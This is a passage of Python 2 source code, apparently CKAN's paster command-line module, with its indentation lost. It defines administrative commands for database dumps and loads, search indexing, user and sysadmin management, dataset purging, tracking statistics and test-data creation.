group_name = 'ckan'
def _get_config(self):
from paste.deploy import appconfig
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
return appconfig('config:' + self.filename)
def _load_config(self):
conf = self._get_config()
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
self.registry=Registry()
self.registry.prepare()
import pylons
self.translator_obj = MockTranslator()
self.registry.register(pylons.translator, self.translator_obj)
if model.user_table.exists():
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
self.registry.register(pylons.c, c)
self.site_user = logic.get_action('get_site_user')({'ignore_auth': True,
'defer_commit': True}, {})
pylons.c.user = self.site_user['name']
pylons.c.userobj = model.User.get(self.site_user['name'])
model.repo.commit_and_remove()
## give routes enough information to run url_for
parsed = urlparse.urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
def _setup_app(self):
cmd = paste.script.appinstall.SetupCommand('setup-app')
cmd.run([self.filename])
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file
db dump-rdf DATASET_NAME FILE_PATH
db simple-dump-csv FILE_PATH - dump just datasets in CSV format
db simple-dump-json FILE_PATH - dump just datasets in JSON format
db user-dump-csv FILE_PATH - dump user information to a CSV file
db send-rdf TALIS_STORE USERNAME PASSWORD
db load FILE_PATH - load a pg_dump from a file
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing
db create-from-model - create database from the model (indexes not made)
db migrate-filestore - migrate all uploaded data from the 2.1 filesore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
import ckan.lib.search as search
cmd = self.args[0]
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print 'Initialising DB: SUCCESS'
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear()
if self.verbose:
print 'Cleaning DB: SUCCESS'
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'simple-dump-csv':
self.simple_dump_csv()
elif cmd == 'simple-dump-json':
self.simple_dump_json()
elif cmd == 'dump-rdf':
self.dump_rdf()
elif cmd == 'user-dump-csv':
self.user_dump_csv()
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print 'Creating DB: SUCCESS'
elif cmd == 'send-rdf':
self.send_rdf()
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print 'Dumped database to: %s' % filepath
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print 'Loaded CKAN database: %s' % filepath
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_dump(dump_path)
def load(self, only_load=False):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_load(dump_path)
if not only_load:
print 'Upgrading DB'
import ckan.model as model
model.repo.upgrade_db()
print 'Rebuilding search index'
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print 'Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.'
print 'Done'
def simple_dump_csv(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='csv')
def simple_dump_json(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need json file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='json')
def dump_rdf(self):
if len(self.args) < 3:
print 'Need dataset name and rdf file path'
return
package_name = self.args[1]
rdf_path = self.args[2]
import ckan.model as model
import ckan.lib.rdf as rdf
pkg = model.Package.by_name(unicode(package_name))
if not pkg:
print 'Dataset name "%s" does not exist' % package_name
return
rdf = rdf.RdfExporter().export_package(pkg)
f = open(rdf_path, 'w')
f.write(rdf)
f.close()
def user_dump_csv(self):
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.UserDumper().dump(dump_file)
def send_rdf(self):
if len(self.args) < 4:
print 'Need all arguments: {talis-store} {username} {password}'
return
talis_store = self.args[1]
username = self.args[2]
password = self.args[3]
import ckan.lib.talis
talis = ckan.lib.talis.Talis()
return talis.send_rdf(talis_store, username, password)
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print "failed to fetch %s (code %s)" % (url,
response.status_code)
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError, e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = '%s'" % id)
Session.execute("update resource_revision set url_type = 'upload'"
"where id = '%s' and "
"revision_id = '%s'" % (id, revision_id))
Session.commit()
print "Saved url %s" % url
def version(self):
from ckan.model import Session
print Session.execute('select version from migrate_version;').fetchall()
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex using multiprocessing using all cores.
This acts in the same way as rubuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self,name):
super(SearchIndexCommand,self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False, help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False, help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False, help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
immediately available on the search, but slows significantly the process.
Default is false.'''
)
def command(self):
if not self.args:
# default to printing help
print self.usage
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print 'Command %s not recognized' % cmd
def rebuild(self):
from ckan.lib.search import rebuild, commit
# BY default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each))
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print 'Missing parameter: dataset-name'
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear
package_id =self.args[1] if len(self.args) > 1 else None
clear(package_id)
def rebuild_fast(self):
### Get out config but without starting pylons environment ####
conf = self._get_config()
### Get ids using own engine, otherwise multiprocess will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
## load actual enviroment for each subprocess, so each have thier own
## sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print 'Command %s not recognized' % cmd
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print RDFExport.__doc__
else:
self.export_datasets( self.args[0] )
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
import urlparse
import urllib2
import pylons.config as config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir( out_folder ):
os.makedirs( out_folder )
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id':dataset_name })
if not dd['state'] == 'active':
continue
url = h.url_for( controller='package',action='read',
id=dd['name'])
url = urlparse.urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join( out_folder, dd['name'] ) + ".rdf"
r = urllib2.urlopen(url).read()
with open(fname, 'wb') as f:
f.write(r)
except IOError, ioe:
sys.stderr.write( str(ioe) + "\n" )
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - add a user as a sysadmin
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0] if self.args else None
if cmd == None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print 'Command %s not recognized' % cmd
def list(self):
import ckan.model as model
print 'Sysadmins:'
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True)
print 'count = %i' % sysadmins.count()
for sysadmin in sysadmins:
print '%s name=%s id=%s' % (sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.id)
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'User "%s" not found' % username
makeuser = raw_input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
password = UserCmd.password_prompt()
print('Creating %s user' % username)
user = model.User(name=unicode(username),
password=password)
else:
print 'Exiting ...'
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print 'Added %s as sysadmin' % username
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for password
if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print 'Users:'
users = model.Session.query(model.User).filter_by(state = 'active')
print 'count = %i' % users.count()
for user in users:
print self.get_user_str(user)
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(unicode(username))
print 'User: \n', user
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print 'Done'
def search(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need user name query string.'
return
query_str = self.args[1]
query = model.User.search(query_str)
print '%i users matching %r:' % (query.count(), query_str)
for user in query.all():
print self.get_user_str(user)
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
print 'Passwords do not match'
sys.exit(1)
return password1
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
sys.exit(1)
username = self.args[1]
# parse args into data_dict
data_dict = {'name': username}
for arg in self.args[2:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError('Could not parse arg: %r (expected "<option>=<value>)"' % arg)
if 'password' not in data_dict:
data_dict['password'] = self.password_prompt()
print('Creating user: %r' % username)
try:
import ckan.logic as logic
site_user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError, e:
print e
sys.exit(1)
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.delete()
model.repo.commit_and_remove()
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
print self.usage
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print 'Datasets:'
datasets = model.Session.query(model.Package)
print 'count = %i' % datasets.count()
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' \
else ''
print '%s %s %s' % (dataset.id, dataset.name, state)
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(unicode(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print '%s %s -> %s' % (dataset.name, old_state, dataset.state)
def purge(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
name = dataset.name
rev = model.repo.new_revision()
dataset.purge()
model.repo.commit_and_remove()
print '%s purged' % name
class Celery(CkanCommand):
'''Celery daemon
Usage:
celeryd <run> - run the celery daemon
celeryd run concurrency - run the celery daemon with
argument 'concurrency'
celeryd view - view all tasks in the queue
celeryd clean - delete all tasks in the queue
'''
min_args = 0
max_args = 2
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
if not self.args:
self.run_()
else:
cmd = self.args[0]
if cmd == 'run':
self.run_()
elif cmd == 'view':
self.view()
elif cmd == 'clean':
self.clean()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def run_(self):
os.environ['CKAN_CONFIG'] = os.path.abspath(self.options.config)
from ckan.lib.celery_app import celery
celery_args = []
if len(self.args) == 2 and self.args[1] == 'concurrency':
celery_args.append['--concurrency=1']
celery.worker_main(argv=['celeryd', '--loglevel=INFO'] + celery_args)
def view(self):
self._load_config()
import ckan.model as model
from kombu.transport.sqlalchemy.models import Message
q = model.Session.query(Message)
q_visible = q.filter_by(visible=True)
print '%i messages (total)' % q.count()
print '%i visible messages' % q_visible.count()
for message in q:
if message.visible:
print '%i: Visible' % (message.id)
else:
print '%i: Invisible Sent:%s' % (message.id, message.sent_at)
def clean(self):
self._load_config()
import ckan.model as model
query = model.Session.execute("select * from kombu_message")
tasks_initially = query.rowcount
if not tasks_initially:
print 'No tasks to delete'
sys.exit(0)
query = model.Session.execute("delete from kombu_message")
query = model.Session.execute("select * from kombu_message")
tasks_afterwards = query.rowcount
print '%i of %i tasks deleted' % (tasks_initially - tasks_afterwards,
tasks_initially)
if tasks_afterwards:
print 'ERROR: Failed to delete all tasks'
sys.exit(1)
model.repo.commit_and_remove()
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print 'Command %s not recognized' % cmd
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
if not user_ratings:
q = q.filter(model.Rating.user_id == None)
print "of which %i are anonymous ratings" % q.count()
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
print self.__class__.__doc__
sys.exit(1)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
print self.__class__.__doc__
sys.exit(1)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
# No date given. See when we last have data for and get data
# from 2 days before then in case new data is available.
# If no date here then use 2011-01-01 as the start date
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print 'tracking updated for %s' % start_date
start_date = stop_date
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(
sql, measure_from=str(measure_from)
).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '%/dataset/'
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)='%s';
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;''' % summary_date
engine.execute(sql)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE t.url LIKE %s || p.name)
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class' : item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc' : plugin.__doc__,
'class' : plugin,
'implements' : []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print plugin + ':'
print '-' * (len(plugin) + 1)
if p['doc']:
print p['doc']
print 'Implements:'
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print ' %s' % i
if extra:
print extra
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# is this a classmethod if so remove the first parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
create-test-data vocabs - annakerenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
self._setup_app()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print 'Creating %s test data' % cmd
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print 'Created user %r with password %r and apikey %r' % ('tester',
'tester', 'tester')
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print 'Command %s not recognized' % cmd
raise NotImplementedError
if self.verbose:
print 'Creating %s test data: Complete!' % cmd
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by runsnakerun.
Usage:
profile URL
e.g. profile /data/search
The result is saved in profile.data.search
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
You may need to install python module: cProfile
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
def profile_url(url):
try:
res = self.app.get(url, status=[200], extra_environ={'REMOTE_USER': 'visitor'})
except paste.fixture.AppError:
print 'App error: ', url.strip()
